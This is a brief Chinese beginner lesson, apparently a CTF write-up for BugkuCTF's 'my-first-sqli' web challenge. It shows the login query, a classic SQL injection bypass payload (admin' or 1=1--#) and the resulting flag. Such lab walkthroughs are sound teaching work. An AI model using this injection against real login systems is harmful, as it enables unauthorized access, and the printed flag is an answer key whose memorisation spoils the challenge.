小白学安全
第四课 web攻防-BugkuCTF【my-first-sqli】
文章目录
声明
文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。
我们将以CTF靶场、仿真靶场等web攻防题目为例,一步步讲解web攻防中的知识点。
一、题目
web类——my-first-sqli
访问靶场
sql语句直接表明:SELECT * FROM USERS WHERE username = ? AND password = ?;
二、WriteUp
1、测试是否为字符串拼接
使用万能账号密码进行测试
admin' or 1=1--#
执行结果,获取到flag
shellmates{CLA$SI1111C_ch4l1enGE}